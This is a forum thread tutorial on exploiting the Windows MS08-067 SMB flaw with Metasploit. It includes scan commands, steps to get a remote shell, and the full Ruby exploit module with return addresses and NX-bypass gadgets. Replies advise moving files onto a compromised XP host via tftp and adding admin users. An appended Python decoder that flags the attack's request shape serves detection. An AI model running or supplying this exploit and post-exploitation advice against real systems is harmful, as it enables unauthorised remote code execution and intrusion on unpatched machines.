
Thread: MS08-067 with metasploit

  1. #1
    Member Nagual
    Join Date
    Nov 2007
    Posts
    289

    MS08-067 with metasploit

    I wrote this some weeks ago when Mr HDM added the sploit in metasploit.

    How to sploit a computer with the vulnerability MS08-067 with metasploit.
    Don't forget to update Metasploit.

    infos:
    http://www.microsoft.com/france/tech.../ms08-067.mspx
    http://www.metasploit.com/dev/trac/b...pi.rb?rev=5820

    First of all we can use metasploit as a scanner
    I made the first scan with the msfconsole

    scan SMB

    Code:
    msf > use scanner/smb/version
    msf auxiliary(version) > set RHOSTS 192.168.1.63
    RHOSTS => 192.168.1.63
    msf auxiliary(version) > run
    [*] 192.168.1.63 is running Windows XP Service Pack 2 (language: French)
    [*] Auxiliary module execution completed

    Finally I decided to use the GUI, it's more fun for a tutorial.

    Second scan to check if the target computer has a vulnerability

    We put the scan options



    Now, if everything is ok we can start the scan



    Now we can launch our attack

    We choose the good sploit and the right target def. (remember our first scan)



    Select the payload and enter the target spec.



    Now, if everything is ok we can launch the exploit



    Here we go, we have a shell on the target.




    If you don't have the ms08_067_netapi.rb option in the auxiliary you can add it. Just add the file in this directory /pentest/exploits/framework3/modules/auxiliary/scanner/smb/
    Or create the file "ms08_067_netapi.rb" in the directory /pentest/exploits/framework3/modules/auxiliary/scanner/smb/
    and add the following code to it

    Code:
    ##
    # $Id:$
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to 
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/projects/Framework/
    ##
    
    
    require 'msf/core'
    
    
    class Metasploit3 < Msf::Exploit::Remote
    
    
    	include Msf::Exploit::Remote::DCERPC
    	include Msf::Exploit::Remote::SMB
    
    
    	def initialize(info = {})
    		super(update_info(info,	
    			'Name'           => 'Microsoft Server Service Relative Path Stack Corruption',
    			'Description'    => %q{
            		This module exploits a parsing flaw in the path canonicalization code of
    				NetAPI32.dll through the Server Service. This development version has 
    				been tested against Windows XP SP2 with DEP enabled.
    			},
    			'Author'         => 
    				[
    					'hdm'
    				],
    			'License'        => MSF_LICENSE,
    			'Version'        => '$Revision: 5773 $',
    			'References'     =>
    				[
    					[ 'MSB', 'MS08-067' ],
    				],
    			'DefaultOptions' =>
    				{
    					'EXITFUNC' => 'thread',
    				},
    			'Privileged'     => true,
    			'Payload'        =>
    				{
    					'Space'    => 400,
    					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
    					'StackAdjustment' => -3500,
    				},
    			'Platform'       => 'win',
    			'Targets'        => 
    				[
    					[ 'Windows XP SP2 English', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6F8916E2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)
    					[ 'Windows XP SP3 English', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6F8917C2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)
    					
    					[ 'Windows 2003 SP0 English', { 'Ret' => 0x71bf175f, 'DisableNX' => 0x71bf175f, 'Scratch' => 0x00020408 }], # jmp esi / jmp esi (ws2help.dll)
    				],
    
    			'DisclosureDate' => 'Oct 12 2008'))
    
    		register_options(
    			[
    				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
    			], self.class)
    						
    	end
    
    	def exploit	
    	
    # NET_API_STATUS NetprPathCanonicalize(
    #  [in, string, unique] SRVSVC_HANDLE ServerName,
    #  [in, string] WCHAR* PathName,
    #  [out, size_is(OutbufLen)] unsigned char* Outbuf,
    #  [in, range(0,64000)] DWORD OutbufLen,
    #  [in, string] WCHAR* Prefix,
    #  [in, out] DWORD* PathType,
    #  [in] DWORD Flags
    # );
    
    		# Padding is really picky for some reason
    		padder = [*("A".."Z")]
    		pad = "A"
    		while(pad.length < 7)
    			c = padder[rand(padder.length)]
    			next if pad.index(c)
    			pad += c
    		end
    		
    
    		prefix = ""
    		server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
    
    		jumper = Rex::Text.rand_text_alpha(70).upcase
    		jumper[04,4] = [target.ret].pack("V") # jmp esi
    		jumper[58,2] = "\xeb\x62"
    
    		path = 
    			Rex::Text.to_unicode("\\") +
    		
    			# This buffer is removed from the front
    			Rex::Text.rand_text_alpha(100) + 
    			
    			# Shellcode
    			payload.encoded +
    			
    			# Relative path to trigger the bug
    			Rex::Text.to_unicode("\\..\\..\\") + 
    			
    			# Extra padding
    			Rex::Text.to_unicode(pad) +
    			
    			# Writable memory location (static)
    			[target['Scratch']].pack("V") + # EBP
    			
    			# NS_DisableNX::g_szCommandLine() FTW (acgenral.dll)
    			[target['DisableNX']].pack("V") +
    			
    			# Padding with embedded jump
    			jumper +
    			
    			# NULL termination
    			"\x00" * 2
    
    		connect()
    		smb_login()
    
    		handle = dcerpc_handle(
    			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 
    			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    		)
    
    		print_status("Binding to #{handle} ...")
    		dcerpc_bind(handle)
    		print_status("Bound to #{handle} ...")
    
    		stub = 
    			NDR.uwstring(server) +
    			NDR.UnicodeConformantVaryingStringPreBuilt(path) +
    			NDR.long(rand(1024)) +
    			NDR.wstring("") +
    			NDR.long(4097) +
    			NDR.long(0)		
    		
    		begin
    			print_status("Triggering the vulnerability...")	
    			dcerpc.call(0x1f, stub)
    		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    		rescue => e
    			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
    				raise e
    			end
    		end
    
    		# Cleanup
    		handler
    		disconnect
    	end
    
    end

    Have fun with Metasploit, tx Mr HDM
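
    From the detection side, an added example that is not from Nagual's post or from Metasploit: a decoder for the NetprPathCanonicalize request stub in the layout the module above builds with the Rex NDR helpers (assumed here: a unique pointer for ServerName, conformant/varying UTF-16LE strings, no 4-byte alignment padding), plus a heuristic that flags the shape this exploit produces, srvsvc opnum 0x1f with an oversized path carrying a `\..\` component. `encode_request` exists only to build constructed samples for the decoder.

```python
import struct

SRVSVC_UUID = "4b324fc8-1670-01d3-1278-5a47bf6ee188"   # srvsvc interface the module binds to
OPNUM_NETPR_PATH_CANONICALIZE = 0x1F                     # opnum the module calls
TRAVERSAL = "\\..\\".encode("utf-16-le")                 # relative component that triggers the bug


def _ndr_wstr(buf, off, unique=False):
    """Read a conformant/varying UTF-16LE string; returns (utf16_bytes, next_offset)."""
    if unique:
        off += 4                                         # skip the referent id of a unique pointer
    _max_count, _offset, actual = struct.unpack_from("<III", buf, off)
    off += 12
    return buf[off:off + actual * 2], off + actual * 2


def parse_path_canonicalize(stub):
    """Decode a NetprPathCanonicalize request stub into the IDL fields listed in the module."""
    server, off = _ndr_wstr(stub, 0, unique=True)
    path, off = _ndr_wstr(stub, off)
    (outbuf_len,) = struct.unpack_from("<I", stub, off)
    prefix, off = _ndr_wstr(stub, off + 4)
    path_type, flags = struct.unpack_from("<II", stub, off)
    return {"server": server.decode("utf-16-le").rstrip("\x00"),
            "path": path, "outbuf_len": outbuf_len,
            "prefix": prefix.decode("utf-16-le").rstrip("\x00"),
            "path_type": path_type, "flags": flags}


def is_suspicious(iface_uuid, opnum, stub, max_path_chars=64):
    """True for the shape MS08-067 attempts take: srvsvc opnum 0x1f, a '\\..\\'
    component and an oversized path. Benign canonicalize calls carry short paths."""
    if iface_uuid.lower() != SRVSVC_UUID or opnum != OPNUM_NETPR_PATH_CANONICALIZE:
        return False
    path = parse_path_canonicalize(stub)["path"]
    return TRAVERSAL in path and len(path) // 2 > max_path_chars


def encode_request(server, path, outbuf_len, prefix, path_type, flags):
    """Build a stub in the same (assumed) layout; used here only for constructed samples."""
    def wstr(s, unique=False):
        raw = (s + "\x00").encode("utf-16-le") if isinstance(s, str) else s  # bytes pass through
        n = len(raw) // 2                                # counts are in UTF-16 characters
        head = struct.pack("<I", 0x20000) if unique else b""
        return head + struct.pack("<III", n, 0, n) + raw
    return (wstr(server, unique=True) + wstr(path) + struct.pack("<I", outbuf_len)
            + wstr(prefix) + struct.pack("<II", path_type, flags))
```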

  2. #2
    Member
    Join Date
    Jun 2008
    Posts
    50


    I have successfully exploited my xp2 (with no firewall and unpatched for a while!!) and got the c:\ prompt. I cannot seem to send the victim machine any files from the linux machine.

    I have tried smb? Authentication fails - I have the login and password!!
    I have tried creating new users (net user xxx/add etc and making an admin rights)
    I have tried smb4k, again authentication fails
    I have tried Konqueror again with same issue.

    I am guessing I am missing something? Any ideas how I can move files from a linux machine to a windows xp machine.

    Not that it's relevant, but the specific files I am trying to move are pureh@te vnc video files.

    Any pointers appreciated.

    Thanks

  3. #3
    fastboi
    Guest


    I installed the new 3.2... and once I run msfgui... after 5 secs or so I get... aborted. Anyone have an idea why it is acting up?

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    Quote Originally Posted by letmein View Post
    I have successfully exploited my xp2 (with no firewall and unpatched for a while!!) and got the c:\ prompt. I cannot seem to send the victim machine any files from the linux machine.

    I have tried smb? Authentication fails - I have the login and password!!
    I have tried creating new users (net user xxx/add etc and making an admin rights)
    I have tried smb4k, again authentication fails
    I have tried Konqueror again with same issue.

    I am guessing I am missing something? Any ideas how I can move files from a linux machine to a windows xp machine.

    Not that it's relevant, but the specific files I am trying to move are pureh@te vnc video files.

    Any pointers appreciated.

    Thanks
    The easiest way is to use tftp. Backtrack has a tftp server on it which creates a home directory in /tmp which listens on port 63 I think. Then execute the tftp command from the windows box with GET and grab the file. I think I do that in one of those videos although I can't remember. The reason tftp is the best is because it's on by default in XP. This is not the case in Vista.

  5. #5
    Junior Member
    Join Date
    Feb 2008
    Posts
    26


    Can I input an iplist.txt to the scanner?

  6. #6
    Member hawaii67
    Join Date
    Feb 2006
    Posts
    318


    Quote Originally Posted by fastboi View Post
    I installed the new 3.2... and once I run msfgui... after 5 secs or so I get... aborted. Anyone have an idea why it is acting up?
    Did you update your gtk2-Version lately??
    Plz start msfgui with

    Code:
    ./msf -D -v 3
    What's the output?
    Don't eat yellow snow :rolleyes:
